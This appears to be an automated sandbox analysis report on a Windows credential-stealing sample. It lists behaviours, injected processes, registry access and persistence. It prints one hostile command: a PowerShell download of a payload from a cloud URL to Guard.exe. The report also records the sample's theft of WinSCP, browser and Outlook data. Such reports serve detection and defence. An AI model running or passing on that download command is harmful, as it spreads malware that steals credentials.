Malware Analysis Report

2024-12-01 03:03

Sample ID 241108-el2wwsxngq
Target e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe
SHA256 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
Tags
execution collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172

Threat Level: Known bad

The file e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe was found to be: Known bad.

Malicious Activity Summary

execution collection discovery spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Drops startup file

Loads dropped DLL

Reads WinSCP keys stored on the system

Executes dropped EXE

Reads user/profile data of web browsers

Accesses Microsoft Outlook accounts

Accesses Microsoft Outlook profiles

Checks installed software on the system

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

outlook_office_path

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies system certificate store

Modifies registry class

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 04:02

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 04:02

Reported

2024-11-08 04:05

Platform

win7-20240903-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

Network

N/A

Files

memory/2512-4-0x000007FEF61CE000-0x000007FEF61CF000-memory.dmp

memory/2512-7-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2512-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2512-8-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-9-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-10-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-11-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

memory/2512-12-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 04:02

Reported

2024-11-08 04:05

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

137s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2392 created 3472 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 2392 created 3472 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 2392 created 3472 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 3232 created 3472 N/A C:\Users\Public\jsc.exe C:\Windows\Explorer.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\rundll32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3232 set thread context of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2928 set thread context of 4788 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 1432 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4668 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4248 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 540 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4372 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4784 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4876 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 984 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 1860 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 2060 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 3544 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2928 set thread context of 4644 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\SysWOW64\rundll32.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Public\jsc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Guard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C6F1081809409790478F3A37BAEEC7537DABDF31 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C6F1081809409790478F3A37BAEEC7537DABDF31\Blob = [Blob value omitted] C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2428 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3668 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3668 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 2392 wrote to memory of 4788 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 4788 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 4788 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 4128 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 4128 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 4128 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2392 wrote to memory of 3232 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 3232 wrote to memory of 4476 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
